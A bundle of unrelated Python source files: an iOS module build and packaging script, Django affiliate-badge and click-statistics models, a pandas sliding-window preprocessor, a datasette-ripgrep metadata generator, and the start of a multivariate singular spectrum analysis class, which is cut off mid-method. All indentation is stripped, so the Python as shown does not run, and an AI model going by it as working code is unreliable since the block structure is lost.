def zip_dir(zf,dir,basepath,ignoreExt=[]):
if not os.path.exists(dir): return
for root, dirs, files in os.walk(dir):
for name in ignoreDirs:
if name in dirs:
dirs.remove(name) # don't visit ignored directories
for file in files:
if file in ignoreFiles: continue
e = os.path.splitext(file)
if len(e) == 2 and e[1] in ignoreExt: continue
from_ = os.path.join(root, file)
to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1)
zf.write(from_, to_)
def glob_libfiles():
files = []
for libfile in glob.glob('build/**/*.a'):
if libfile.find('Release-')!=-1:
files.append(libfile)
return files
def build_module(manifest,config):
from tools import ensure_dev_path
ensure_dev_path()
rc = os.system("xcodebuild -sdk iphoneos -configuration Release")
if rc != 0:
die("xcodebuild failed")
rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release")
if rc != 0:
die("xcodebuild failed")
# build the merged library using lipo
moduleid = manifest['moduleid']
libpaths = ''
for libfile in glob_libfiles():
libpaths+='%s ' % libfile
os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid))
def package_module(manifest,mf,config):
name = manifest['name'].lower()
moduleid = manifest['moduleid'].lower()
version = manifest['version']
modulezip = '%s-iphone-%s.zip' % (moduleid,version)
if os.path.exists(modulezip): os.remove(modulezip)
zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
modulepath = 'modules/iphone/%s/%s' % (moduleid,version)
zf.write(mf,'%s/manifest' % modulepath)
libname = 'lib%s.a' % moduleid
zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname))
docs = generate_doc(config)
if docs!=None:
for doc in docs:
for file, html in doc.iteritems():
filename = string.replace(file,'.md','.html')
zf.writestr('%s/documentation/%s'%(modulepath,filename),html)
zip_dir(zf,'assets',modulepath,['.pyc','.js'])
zip_dir(zf,'example',modulepath,['.pyc'])
zip_dir(zf,'platform',modulepath,['.pyc','.js'])
zf.write('../LICENSE','%s/LICENSE' % modulepath)
zf.write('module.xcconfig','%s/module.xcconfig' % modulepath)
exports_file = 'metadata.json'
if os.path.exists(exports_file):
zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
zf.close()
if __name__ == '__main__':
manifest,mf = validate_manifest()
validate_license()
config = read_ti_xcconfig()
sdk = find_sdk(config)
sys.path.insert(0,os.path.join(sdk,'iphone'))
sys.path.append(os.path.join(sdk, "common"))
compile_js(manifest,config)
build_module(manifest,config)
package_module(manifest,mf,config)
sys.exit(0)
|
from collections import defaultdict
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import User
from django.core.cache import cache
from django.db import models
from caching.base import CachingManager, CachingMixin
from shared.models import LocaleImage, ModelBase, MultiTableParentModel
# Cache keys
CACHE_CLICKS_TOTAL = 'clicks_total'
CACHE_CLICKS_BADGE_TOTAL = 'clicks_badge_total_%s'
CACHE_CLICKS_AVG = 'clicks_avg_%s_%s'
CACHE_CLICKS_USERPERIOD_TOTAL = 'clicks_userperiod_total_%s_%s_%s'
CACHE_TOP_USERS = 'top_users'
class Category(CachingMixin, ModelBase):
"""Top-level category that contains sub-categories."""
name = models.CharField(max_length=255)
objects = CachingManager()
def __unicode__(self):
return self.name
class Subcategory(CachingMixin, ModelBase):
"""Second-level category that contains badges."""
parent = models.ForeignKey(Category)
name = models.CharField(max_length=255)
def preview_img_url(self, locale):
try:
# TODO: Track timing data for this in statsd
badge = self.badge_set.order_by('?')[:1]
return badge[0].preview_img_url(locale)
except IndexError:
return settings.DEFAULT_BADGE_PREVIEW
def __unicode__(self):
return self.name
class Badge(CachingMixin, MultiTableParentModel):
"""
Parent model for any banner, text link, or other item that users will put
on their website as an affiliate link.
"""
name = models.CharField(max_length=255)
subcategory = models.ForeignKey(Subcategory)
href = models.URLField(verify_exists=False,
verbose_name=u'URL to redirect to')
displayed = models.BooleanField(default=True)
objects = CachingManager()
@property
def clicks(self):
return ClickStats.objects.total_for_badge(self)
def customize_url(self):
"""Return a URL pointing to the customization page for this badge."""
return self.child().customize_url()
def preview_img_url(self, locale):
"""Return a URL pointing to a preview image for this badge."""
previews = self.badgepreview_set
return (
# First try the proper preview
self._get_preview(previews, locale=locale) or
# Fallback to the default language
self._get_preview(previews, locale=settings.LANGUAGE_CODE) or
# Fallback again to the first available locale
self._latest_preview(previews) or
# Really? Nothing? Oh well. Firefox logo it is.
settings.DEFAULT_BADGE_PREVIEW)
def _get_preview(self, set, **kwargs):
try:
return set.get(**kwargs).image.url
except (BadgePreview.DoesNotExist,
BadgePreview.MultipleObjectsReturned):
return None
def _latest_preview(self, set):
result = list(set.all()[:1])
if result:
return result[0].image.url
return None
def __unicode__(self):
return self.name
class BadgePreview(CachingMixin, LocaleImage):
badge = models.ForeignKey(Badge)
class Meta:
unique_together = ('locale', 'badge')
def __unicode__(self):
return 'Preview: %s(%s)' % (self.badge, self.locale)
class BadgeInstanceManager(CachingManager):
def for_user_by_category(self, user):
results = defaultdict(list)
instances = BadgeInstance.objects.no_cache().filter(user=user)
for instance in instances:
results[instance.badge.subcategory.parent.name].append(instance)
return results
class BadgeInstance(CachingMixin, MultiTableParentModel):
"""
Single instance of a badge that a user has created and sent clicks to.
"""
created = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(User)
badge = models.ForeignKey(Badge)
clicks = models.PositiveIntegerField(default=0)
objects = BadgeInstanceManager()
@property
def preview(self):
"""Return the HTML to preview this BadgeInstance."""
return self.child().preview
@property
def code(self):
"""Return the HTML to embed this BadgeInstance."""
return self.child().code
def details_template(self):
"""
Return the path for the template used to render details about
this badgeinstance on the my_banners page. Returns None if there
is no template.
"""
return getattr(self.child(), 'details_template', None)
def add_click(self, year=None, month=None):
"""Add a click to this instance and associated ClickStats objects."""
if year is None or month is None:
now = datetime.now()
if year is None:
year = now.year
if month is None:
month = now.month
dt = datetime(year, month, 1)
stats, created = self.clickstats_set.get_or_create(datetime=dt)
stats.clicks = models.F('clicks') + 1
stats.save()
self.clicks = models.F('clicks') + 1
self.save()
class ClickStatsManager(models.Manager):
def total(self):
"""Return the total number of clicks"""
total = cache.get(CACHE_CLICKS_TOTAL)
if total is None:
total = self._total()
cache.set(CACHE_CLICKS_TOTAL, total)
return total
def total_for_badge(self, badge):
"""
Return the total number of clicks for each badge.
"""
key = CACHE_CLICKS_BADGE_TOTAL % (badge.pk)
total = cache.get(key)
if total is None:
total = self._total(badge_instance__badge=badge)
cache.set(key, total)
return total
def total_for_user(self, user):
"""Return the total number of clicks found for the given user."""
results = (BadgeInstance.objects.filter(user=user)
.aggregate(models.Sum('clicks')))
return results['clicks__sum'] or 0
def total_for_user_period(self, user, month, year):
"""
Return the total number of clicks found for the given user and month.
"""
key = CACHE_CLICKS_USERPERIOD_TOTAL % (user.id, month, year)
total = cache.get(key)
if total is None:
total = self._total(badge_instance__user=user,
datetime__month=month, datetime__year=year)
cache.set(key, total)
return total
def _total(self, **kwargs):
"""Return the total number of clicks for the given filters."""
clickstats = self.filter(**kwargs)
results = clickstats.aggregate(models.Sum('clicks'))
return results['clicks__sum'] or 0
def average_for_period(self, month, year):
"""Return the average number of clicks for the given period."""
key = CACHE_CLICKS_AVG % (month, year)
average = cache.get(key)
if average is None:
clicks_sum = models.Sum('badgeinstance__clickstats__clicks')
results = (User.objects
.filter(badgeinstance__clickstats__datetime__month=month,
badgeinstance__clickstats__datetime__year=year)
.annotate(clicks=clicks_sum)
.aggregate(models.Avg('clicks')))
# Average is sometimes None, so substitute 0
average = results['clicks__avg'] or 0
# Remove decimal
average = int(average)
cache.set(key, average)
return average
class ClickStats(ModelBase):
"""Tracks historical data for an affiliate's referrals."""
badge_instance = models.ForeignKey(BadgeInstance)
datetime = models.DateTimeField()
clicks = models.IntegerField(default=0)
objects = ClickStatsManager()
class Meta:
unique_together = ('badge_instance', 'datetime')
class LeaderboardManager(CachingManager):
def top_users(self, count):
leaderboard = cache.get(CACHE_TOP_USERS)
if leaderboard is None:
leaderboard = (self.select_related('user', 'user__userprofile')
.order_by('ranking')[:count])
cache.set(CACHE_TOP_USERS, list(leaderboard))
return leaderboard
class Leaderboard(CachingMixin, ModelBase):
"""Stores a user's standing in the leaderboard."""
ranking = models.PositiveIntegerField(primary_key=True)
user = models.ForeignKey(User)
clicks = models.PositiveIntegerField()
objects = LeaderboardManager()
|
# preprocessing
import pandas as pd
import sys
import numpy as np
def main(size):
"""
Metoda na pouzitie sliding window
"""
all_csv = pd.read_csv("all2.csv", dtype={'x':np.int16, 'y':np.int16, 'z':np.int16,'movement':np.int8, 'user':np.int8})
#print(all_csv)
# print (all_csv.dtypes)
# return
start = 0
index_increment=size+start-1
end = index_increment
slidedataframe = pd.DataFrame()
iteration=1
mycolumns=[]
prev_movement=all_csv.ix[end,4]
prev_userid=all_csv.ix[end,5]
counter_100k = 1
out_file = "sliding{}.csv"
while (all_csv.shape[0]-1 > end):
movement = all_csv.ix[end,4]
userid = all_csv.ix[end,5]
if (prev_movement != movement) or (prev_userid != userid):
start=end
end=start+index_increment
prev_movement=movement
prev_userid=userid
continue
tmp = all_csv.ix[start:end,1:4]
tmp = tmp.stack().to_frame().T
prev_movement=movement
prev_userid=userid
if iteration == 1:
mycolumns=['{}_{}'.format(*c) for c in tmp.columns]
iteration=2
tmp.columns = mycolumns
# print (tmp.columns)
tmp['movement'] = movement
tmp['user'] = userid
tmp[['movement','user']]=tmp[['movement','user']].astype(np.int8)
slidedataframe = slidedataframe.append(tmp)
start += 1
end += 1
# if end == 100:
# print (slidedataframe.dtypes)
# break
if (end % 1000 == 0):
print(end)
# print(slidedataframe)
# break
if (end % 100000 == 0):
# save to csv
slidedataframe.to_csv(out_file.format(counter_100k),sep=',')
slidedataframe = pd.DataFrame()
counter_100k+=1
# vypis posledneho dataframe-u
slidedataframe.to_csv(out_file.format(counter_100k), sep=',')
if __name__ == '__main__':
sliding_window_size=50
main(sliding_window_size) |
from datetime import datetime
import os
import pytz
from pytz import timezone
project_urls = {}
projects = os.listdir('all')
for project in projects:
git_config = os.path.join('all', project, '.git', 'config')
with open(git_config, encoding='utf-8') as f:
for line in f:
if line.strip().startswith('url'):
url = line.split()[-1].rstrip('.git')
project_urls[project] = url
metadata_template = """\
title: Search Enthought Tool Suite Source Code
about: achabotl/datasette-ripgrep-ets
about_url: https://github.com/achabotl/datasette-ripgrep-ets
description_html: |-
<style>
form.ripgrep label {
font-weight: normal;
display: inline;
}
</style>
<form class="ripgrep" action="/-/ripgrep" method="get">
<p>
<input type="search" name="pattern" value="">
<input type="submit" value="Search">
</p>
<p><strong>Options:</strong> <label><input type="checkbox" name="literal"> Literal search (not regex)</label> <label><input type="checkbox" name="ignore"> Ignore case</label></p>
<p>
<label><strong>File pattern</strong>: <input type="text" style="max-width: 20em" name="glob" value=""></label>
</p>
<p class="glob-examples">For example <code>*.py</code> or <code>**/templates/**/*.html</code> or <code>datasette/**</code> or </code><code>!setup.py</code>
</p>
</form>
<p>%(updated)s</p>
<ul class="bullets">
%(project_links)s
</ul>
plugins:
datasette-ripgrep:
path: /app/all
time_limit: 5.0
"""
us_central = timezone('US/Central')
now = datetime.now(pytz.utc).astimezone(us_central)
fmt = '%Y-%m-%d %H:%M:%S %Z%z'
updated = f"The following projects were last indexed on {now.strftime(fmt)}:"
project_links = '\n'.join(
f' <li><a href="{url}">{project}</a></li>'
for project, url in sorted(project_urls.items()))
metadata = metadata_template % {'updated': updated, 'project_links': project_links}
with open('./metadata.yml', 'w', encoding='utf-8') as f:
f.write(metadata)
|
import numpy as np
from numpy.linalg import matrix_rank
from pprint import pprint
from scipy.spatial.distance import cdist, pdist, squareform
from scipy.linalg import hankel
from functools import partial, lru_cache, reduce
from tqdm.autonotebook import tqdm
from .optimized import *
from .ops import *
from sklearn.utils.extmath import randomized_svd
from sklearn.metrics import explained_variance_score
class MSSA:
'''Multivariate Singular Spectrum Analysis
Implements MSSA decomposition and (recurrent) forecasting using MSSA. This
implementation uses the vertical (V-MSSA) rather than horizontal (H-MSSA)
structure for the trajectory matrix.
Parameters
----------
window_size : int | None
The window size parameter controls the dimensionality of the trajectory
matrices constructed for each timeseries (and then stacked). Timeseries
are converted into trajectory matrices through "hankelization", where
columns and rows represent different "windows" of the timeseries,
incrementing across the timeseries. With window_size = L, the resulting
trajectory matrix of a timeseries vector (N) will be of shape (L, K), where
K = N - L + 1. As such, window_size should be no greater than N // 2. If
left as None, MSSA will select the maximum possible window size.
Note that with a multivariate timeseries input matrix (N, P), the resulting
trajectory matrix stacked vertically will be of shape (P * L, K).
The window size parameter can have a significant impact on the quality of
the MSSA decomposition and forecasting. Some recommend that window
size should be as large as possible to capture the most signal
in the data, but there does not seem to be general agreement on a "best"
window size. The author of the MSSA algorithm states in one of her papers
that it is best to try many different window size parameters to see what
works best with your data. If you have an idea of what frequency signal
will occur in your data, try out window sizes that are multiples of that
frequency (e.g. 24, 36, 48 if you have monthly data).
n_components: int | None | 'variance_threshold' | 'parallel_analysis' | 'svht'
Argument specifing the number of components to keep from the SVD decomposition.
This is the equivalent of the n_components parameter in sklearn's PCA,
for example. If None, the maximum number of (non-zero singular value)
components will be selected.
There are a few autmatic options for component selection:
- 'svht'
Select components using the Singular Value Hard Thresholding
formula. This is the default setting. For more details on this
formula please see this paper: https://arxiv.org/pdf/1305.5870.pdf
- 'parallel_analysis'
Performs parallel analysis to select the number of components that
outperform a user-specified percentile threshold of noise components
from randomly generated datasets of the same shape. Parallel analysis
is a gold standard method for selecting a number of components in
principal component analysis, which MSSA is closely related to.
Eigenvalue noise threshold is set via the `pa_percentile_threshold`
argument. Note that this procedure can be very slow depending on
the size of your data.
- 'variance_threshold'
Select the number of components based on a variance explained percent
threshold. The threshold cutoff is specified by the argument
`variance_explained_threshold`
variance_explained_threshold : float | None
If `n_components = 'variance_threshold'`, this argument controls the
cutoff for keeping components based on cumulative variance explained. This
must be a float between 0 and 1. A value of 0.95, for example, will
keep the number of components that explain 95 percent of the variance.
This has no effect unless 'variance_threshold' is the selected method for
`n_components`.
pa_percentile_threshold : float | None
If `n_components = 'parallel_analysis'`, this specifies the percentile
of noise eigenvalues that must be exceeded by the real eigenvalues for
components to be kept. Should be a number between 0 and 100. This has no
effect unless 'parallel_analysis' is selected for `n_components`.
svd_method : str
Can be one of:
- 'randomized'
The default. Uses the `randomized_svd` method from scikit-learn to
perform the singular value decomposition step. It is highly recommended
that you keep this argument as 'randomized', especially if you are
dealing with large data.
- 'exact'
Performs exact SVD via numpy.linalg.svd. This should be OK for small
or even medium size datasets, but is not recommended.
varimax : bool
[EXPERIMENTAL] If `True`, performs a structured varimax rotation on the
left singular vectors following the SVD decomposition step in the
MSSA algorithm. This should be used with caution as the code is experimental.
The idea of applying structured varimax is to better separate the components
for the multiple timeseries fit by MSSA. See this presentation for
more information on the structured varimax rotation applied to MSSA:
http://200.145.112.249/webcast/files/SeminarMAR2017-ICTP-SAIFR.pdf
verbose : bool
Verbosity flag. If true, will print out status updates during the fit
procedure.
Attributes
----------
These attributes will become available after fitting.
N_ : int
Observations in timeseries.
P_ : int
Number of timeseries.
L_ : int
Window size of trajectory matrices.
K_ : int
Column dimension of trajectory matrices.
rank_ : int
The selected rank (number of components kept)
left_singular_vectors_ : numpy.ndarray
The left singular vectors from the decomposition of the covariance of
trajectory matrices via SVD.
singular_values_ : numpy.ndarray
Singular values from SVD
explained_variance_ : numpy.ndarray
The explained variance of the SVD components
explained_variance_ratio_ : numpy.ndarray
Percent of explained variance for each component
components_ : numpy.ndarray
The MSSA components. This is the result of the decomposition and
reconstruction via diagonal averaging. The sum of all the components
for a timeseries (without reducing number of components) will perfectly
reconstruct the original timeseries.
The dimension of this matrix is (P, N, rank), where P is the number
of timeseries, N is the number of observations, and rank is the
number of components selected to keep.
component_ranks_ : numpy.ndarray
This matrix shows the rank of each component per timeseries according
to the reconstruction error. This is a (rank, P) matrix, with rank
being the number of components and P the number of timeseries. For
example, if component_ranks_[0, 0] = 3, this would mean that the
3rd component accounts for the most variance for the first timeseries.
component_ranks_explained_variance_ : numpy.ndarray
This shows the explained variance percent for the ranked components
per timeseries. Like component_ranks_, this is a (rank, P) matrix.
The values in this matrix correspond to the percent of variance
explained by components per timeseries in rank order of their
efficiency in reconstructing the timeseries.
'''
def __init__(self,
window_size=None,
n_components='svht',
variance_explained_threshold=0.95,
pa_percentile_threshold=95,
svd_method='randomized',
varimax=False,
verbose=True):
self.set_params(window_size=window_size,
n_components=n_components,
variance_explained_threshold=variance_explained_threshold,
pa_percentile_threshold=pa_percentile_threshold,
svd_method=svd_method,
varimax=varimax,
verbose=verbose)
def get_params(self,
deep=True):
'''get_params method for compliance with sklearn model api.'''
return dict(
window_size=self.window_size,
n_components=self.n_components,
variance_explained_threshold=self.variance_explained_threshold,
pa_percentile_threshold=self.pa_percentile_threshold,
svd_method=self.svd_method,
varimax=self.varimax,
verbose=self.verbose
)
def set_params(self,
**parameters):
'''set_params method for compliance with sklearn model api.'''
for parameter, value in parameters.items():
setattr(self, parameter, value)
return self
def _apply_structured_varimax(self,
left_singular_vectors,
singular_values,
P,
L,
gamma=1,
tol=1e-6,
max_iter=1000):
'''
[EXPERIMENTAL]
Applies the structured varimax rotation to the left singular vectors
and singular values. For more information on this procedure in MSSA please
see this slideshow:
http://200.145.112.249/webcast/files/SeminarMAR2017-ICTP-SAIFR.pdf
'''
T = structured_varimax(
left_singular_vectors,
P,
L,
gamma=gamma,
tol=tol,
max_iter=max_iter
)
U = left_singular_vectors @ T
slen = singular_values.shape[0]
s = np.diag(T[:slen, :slen].T @ np.diag(singular_values) @ T[:slen, :slen])
return U, s
def _parallel_analysis_component_selection(self,
timeseries,
L,
K,
rank,
singular_values,
iterations=100):
'''
Performs parallel analysis to help select the appropriate number of MSSA
components to keep. The algorithm follows these steps:
1. Calculate the eigenvalues via SVD/PCA on your real dataset.
2. For a given number of iterations:
3. Construct a random noise matrix the same shape as your real data.
4. Perform decomposition of the random noise data.
5. Calculate the eigenvalues for the noise data and track them per
iteration.
6. Calculate the percentile at a user-specified threshold of the noise
eigenvalues at each position.
7. Select only the number of components in the real data whose eigenvalues
exceed those at the specified percentile of the noise eigenvalues.
'''
def _bootstrap_eigenvalues(ts_std, ts_shape, L, K, rank):
# create random normal differences with equivalent standard deviations
ts_rnorm = np.random.normal(
np.zeros(ts_shape[1]),
ts_std,
size=ts_shape
)
# create noise trajectory matrix
rnorm_trajectory_matrix = ts_matrix_to_trajectory_matrix(
ts_rnorm,
L,
K
)
# decompose the noise trajectory matrix
U, s, V, rank = decompose_trajectory_matrix(
rnorm_trajectory_matrix,
rank,
svd_method=self.svd_method
)
# return the eigenvalues
return s ** 2
# calculate real eigenvalues
eigenvalues = singular_values ** 2
# calculate standard deviations column-wise
ts_std = np.std(timeseries, axis=0)
# bootstrap the eigenvalues
noise_eigenvalues = [
_bootstrap_eigenvalues(
ts_std,
timeseries.shape,
L,
K,
rank
)
for i in tqdm(range(iterations), disable=(not self.verbose))
]
noise_eigenvalues = np.concatenate(noise_eigenvalues, axis=0)
# calculate the 95th percentile of the noise eigenvalues
eig_pctl = np.percentile(noise_eigenvalues, 95, axis=0)
# find the first index where the noise eigenvalue 95th percentile is >= real
adjusted_rank = np.where(eig_pctl > eigenvalues)[0][0]
return adjusted_rank
def _calculate_optimal_reconstruction_orders(self,
timeseries,
components):
'''Calculates the optimal component ordering for reconstructing
each of the timeseries. This is done by simply ranking the components
in terms of how much variance they explain for each timeseries in the
original data.
'''
optimal_orders = optimal_component_ordering(
timeseries,
components
)
optimal_orders = optimal_orders.astype(int)
order_explained_variance = np.zeros_like(optimal_orders).astype(float)
for ts_idx in range(timeseries.shape[1]):
ts_comp = components[ts_idx, :, :]
ts_comp = ts_comp[:, optimal_orders[:, ts_idx]]
# ts_comp = np.cumsum(ts_comp, axis=1)
order_explained_variance[:, ts_idx] = np.apply_along_axis(
partial(explained_variance_score, timeseries[:, ts_idx]),
0,
ts_comp
)
return optimal_orders, order_explained_variance
def _validate_initialization_arguments(self):
# Check the window size parameter
if self.window_size is not None:
if not isinstance(self.window_size, int):
raise Exception("window_size must be an integer (or None).")
if self.window_size > (self.N_ // 2):
raise Exception("window_size must be <= (timeseries length // 2).")
# Check the components parameter
if self.n_components is not None:
if isinstance(self.n_components, str):
comp_options = ['variance_threshold','svht','parallel_analysis']
if self.n_components not in comp_options:
raise Exception('automatic n_component selections mus be one of:', comp_options)
elif isinstance(self.n_components, int):
if self.n_components > (self.N_ - self.L_ + 1):
raise Exception("Too many n_components specified for given window_size.")
if self.n_components < 1:
raise Exception("n_components cannot be set < 1.")
else:
raise Exception('Invalid value for n_components set.')
# Check variance explained threshold
if self.variance_explained_threshold is not None:
if not (self.variance_explained_threshold > 0):
raise Exception("variance_explained_threshold must be > 0 (or None).")
if not (self.variance_explained_threshold <= 1):
raise Exception("variance_explained_threshold must be <= 1 (or None).")
elif self.n_components == 'variance_threshold':
raise Exception("If n_components == 'variance_threshold', variance_explained_threshold cannot be None.")
# check parallel analysis threshold
if self.pa_percentile_threshold is None and self.n_components == 'auto':
raise Exception("If n_components == 'auto', pa_percentile_threshold must be specified.")
if self.pa_percentile_threshold is not None:
if (self.pa_percentile_threshold <= 0) or (self.pa_percentile_threshold > 100):
raise Exception("pa_percentile_threshold must be > 0 and <= 100.")
# check svd method
if not self.svd_method in ['randomized', 'exact']:
raise Exception("svd_method must be one of 'randomized', 'exact'.")
def fit(self,
timeseries):
'''Performs MSSA decomposition on a univariate or multivariate timeseries.
Multivariate timeseries should have observations in rows and timeseries
indices in columns.
After fitting, many attributes become available to the user:
N_ : int
Observations in timeseries.
P_ : int
Number of timeseries.
L_ : int
Window size of trajectory matrices.
K_ : int
Column dimension of trajectory matrices.
rank_ : int
The selected rank (number of components kept)
left_singular_vectors_ : numpy.ndarray
The left singular vectors from the decomposition of the covariance of
trajectory matrices via SVD.
singular_values_ : numpy.ndarray
Singular values from SVD
explained_variance_ : numpy.ndarray
The explained variance of the SVD components
explained_variance_ratio_ : numpy.ndarray
Percent of explained variance for each component
components_ : numpy.ndarray
The MSSA components. This is the result of the decomposition and
reconstruction via diagonal averaging. The sum of all the components
for a timeseries (without reducing number of components) will perfectly
reconstruct the original timeseries.
The dimension of this matrix is (P, N, rank), where P is the number
of timeseries, N is the number of observations, and rank is the
number of components selected to keep.
component_ranks_ : numpy.ndarray
This matrix shows the rank of each component per timeseries according
to the reconstruction error. This is a (rank, P) matrix, with rank
being the number of components and P the number of timeseries. For
example, if component_ranks_[0, 0] = 3, this would mean that the
3rd component accounts for the most variance for the first timeseries.
component_ranks_explained_variance_ : numpy.ndarray
This shows the explained variance percent for the ranked components
per timeseries. Like component_ranks_, this is a (rank, P) matrix.
The values in this matrix correspond to the percent of variance
explained by components per timeseries in rank order of their
efficiency in reconstructing the timeseries.
Parameters
----------
timeseries : numpy.ndarray | pandas.DataFrame | pandas.Series
The timeseries data to be decomposed. This will be converted to
a numpy array if it is in pandas format.
'''
timeseries = getattr(timeseries, 'values', timeseries)
if timeseries.ndim == 1:
timeseries = timeseries[:, np.newaxis]
self.timeseries_ = timeseries
self.N_ = timeseries.shape[0]
self.P_ = timeseries.shape[1]
self.L_ = (self.N_ // 2)
self._validate_initialization_arguments()
if self.window_size is not None:
self.L_ = self.window_size
self.K_ = self.N_ - self.L_ + 1
if self.verbose:
print('Constructing trajectory matrix')
self.trajectory_matrix_ = ts_matrix_to_trajectory_matrix(
self.timeseries_,
self.L_,
self.K_
)
if self.verbose:
print('Trajectory matrix shape:', self.trajectory_matrix_.shape)
if self.verbose:
print('Decomposing trajectory covariance matrix with SVD')
U, s, V, rank = decompose_trajectory_matrix(
self.trajectory_matrix_,
self.K_,
svd_method=self.svd_method
)
self.rank_ = rank
self.left_singular_vectors_ = U
self.singular_values_ = s
if self.varimax:
if self.verbose:
print('Applying structured varimax to singular vectors')
self.left_singular_vectors_, self.singular_values_ = self._apply_structured_varimax(
self.left_singular_vectors_,
self.singular_values_,
self.P_,
self.L_
)
exp_var, exp_var_ratio = sv_to_explained_variance_ratio(
self.singular_values_,
self.N_
)
self.explained_variance_ = exp_var
self.explained_variance_ratio_ = exp_var_ratio
if self.n_components == 'svht':
self.rank_ = singular_value_hard_threshold(
self.singular_values_,
rank=self.rank_
)
if self.verbose:
print('Reduced rank to {} according to SVHT threshold'.format(self.rank_))
elif self.n_components == 'variance_threshold':
exp_var_ratio_cs = np.cumsum(exp_var_ratio)
cutoff_n = np.sum(exp_var_ratio_cs <= self.variance_explained_threshold)
self.rank_ = cutoff_n
if self.verbose:
print('Reduced rank to {} according to variance explained threshold'.format(self.rank_))
elif self.n_components == 'parallel_analysis':
if self.verbose:
print('Performing parallel analysis to determine optimal rank')
self.rank_ = self._parallel_analysis_component_selection(
self.timeseries_,
self.L_,
self.K_,
self.rank_,
self.singular_values_
)
if self.verbose:
print('Rank selected via parallel analysis: {}'.format(self.rank_))
elif isinstance(self.n_components, int):
self.rank_ = np.minimum(self.rank_, self.n_components)
if self.verbose:
print('Constructing components')
self.components_ = incremental_component_reconstruction(
self.trajectory_matrix_,
self.left_singular_vectors_,
self.singular_values_,
self.rank_,
self.P_,
self.N_,
self.L_
)
if self.verbose:
print('Calculating optimal reconstruction orders')
ranks, rank_exp_var = self._calculate_optimal_reconstruction_orders(
self.timeseries_,
self.components_
)
self.component_ranks_ = ranks
self.component_ranks_explained_variance_ = rank_exp_var
self.component_groups_ = {
ts_idx:[i for i in range(self.components_.shape[2])]
for ts_idx in range(self.P_)
}
return self
@property
def hankel_weights_(self):
'''The hankel weights are used to calculate the weighted correlation
between components'''
weights = construct_hankel_weights(
self.L_,
self.K_,
self.N_
)
weights = weights.astype(float)
return weights
def w_correlation(self, ts_components):
'''Calculates the w-correlation (weighted correlation) between timeseries
components according to the hankelization weights. The weighting is
required for an appropriate correlation measure since in the trajectory
matrix format of a timeseries observations end up repeated multiple times.
Observations that are in fewer "windows" of the trajectory matrix
are downweighted relative to those that appear in many windows.'''
weights = self.hankel_weights_
w_corr = hankel_weighted_correlation(
ts_components,
weights
)
return w_corr
@property
def grouped_components_(self):
if getattr(self, 'component_groups_', None) is None:
return None
_cgrouped = {
ts_idx:np.concatenate([
self.components_[ts_idx, :, np.atleast_1d(group)].T.sum(axis=1)[:, np.newaxis]
for group in ts_cgroups
], axis=1)
for ts_idx, ts_cgroups in self.component_groups_.items()
}
return _cgrouped
def _validate_component_group_assignment(self,
timeseries_index,
groups):
if getattr(self, 'component_groups_', None) is None:
raise Exception('MSSA must be fit before assigning component groups.')
if timeseries_index not in self.component_groups_:
raise Exception('timeseries_index not in {}'.format(self.component_groups_.keys()))
if not isinstance(groups, (list, tuple, np.ndarray)):
raise Exception('groups must be a list of lists (or int), with each sub-list component indices')
for group in groups:
group = np.atleast_1d(group)
for ind in group:
if ind not in np.arange(self.components_.shape[2]):
raise Exception('Component index {} not in valid range'.format(ind))
return True
def set_component_groups(self,
component_groups_dict):
'''Method to assign component groupings via a dictionary. The dictionary
must be in the format:
`{timeseries_index:groups}`
Where `timeseries_index` is the column index of the timeseries, and
groups is a list of lists where each sublist contains indices for the
components in that particular group.
For example, if you were updating the component groupings for the first
two timeseries it might look something like this:
`{
0:[
[0,1,2],
[3],
[4,5],
[6,7,8]
],
1:[
[0],
[1,2],
[3],
[4,5,6]
]
}`
The passed in dictionary will update the `component_groups_` attribute.
Note that this function will raise an exception if the fit method has
not been run yet, since there are no components until decomposition occurs.
The `component_groups_` attribute defaults to one component per group
after fitting (as if all components are independent).
The `grouped_components_` attribute is a dictionary with timeseries
indices as keys and the grouped component matrix as values. These matrices
are the actual data representation of the groups that you specify in
`component_groups_`. If you change `component_groups_`, the `grouped_components_`
attribute will automatically update to reflect this.
Parameters
----------
component_group_dict : dict
Dictionary with timeseries index as keys and list-of-list component
index groupings as values. Updates the `component_groups_` and
`grouped_components_` attributes.
'''
if not isinstance(component_groups_dict, dict):
raise Exception('Must provide a dict with ts_index:groups as key:value pairs')
for ts_idx, groups in component_groups_dict.items():
_ = self._validate_component_group_assignment(ts_idx, groups)
self.component_groups_.update(component_groups_dict)
return self
def set_ts_component_groups(self,
timeseries_index,
groups):
'''Method to assign component groupings via a timeseries index and a
list of lists, where each sublist is indices of the components for that
group. This is an alternative to the `set_component_groups` function.
For example if you were updating component 1 it may look something like
this:
`timeseries_index = 1
groups = [
[0],
[1,2],
[3],
[4,5,6]
]
mssa.set_ts_component_groups(timeseries_index, groups)
}`
This will update the `component_groups_` attribute with the new groups
for the specified timeseries index.
Note that this function will raise an exception if the fit method has
not been run yet, since there are no components until decomposition occurs.
The `component_groups_` attribute defaults to one component per group
after fitting (as if all components are independent).
The `grouped_components_` attribute is a dictionary with timeseries
indices as keys and the grouped component matrix as values. These matrices
are the actual data representation of the groups that you specify in
`component_groups_`. If you change `component_groups_`, the `grouped_components_`
attribute will automatically update to reflect this.
Parameters
----------
timeseries_index : int
Column index of the timeseries to update component groupings for.
groups : list
List of lists, where each sub-list is indices for components in
that particular group.
'''
_ = self._validate_component_group_assignment(timeseries_index, groups)
self.component_groups_[timeseries_index] = groups
return self
def forecast(self,
timepoints_out,
timeseries_indices=None,
use_components=None):
'''Forecasts out a number of timepoints using the recurrent forecasting
formula.
Parameters
----------
timepoints_out : int
How many timepoints to forecast out from the final observation given
to fit in MSSA.
timeseries_indices : None | int | numpy.ndarray
If none, forecasting is done for all timeseries. If an int or array
of integers is specified, the forecasts for the timeseries at those
indices is performed. (In reality this will always forecast for all
timeseries then simply use this to filter the results at the end.)
use_components : None | int | numpy.ndarray
Components to use in the forecast. If None, all components will be
used. If an int, that number of top components will be selected (e.g
if `use_components = 10`, the first 10 components will be used). If
a numpy array, those compoents at the specified indices will be used.
'''
if use_components is None:
use_components = np.arange(self.components_.shape[2])
elif isinstance(use_components, int):
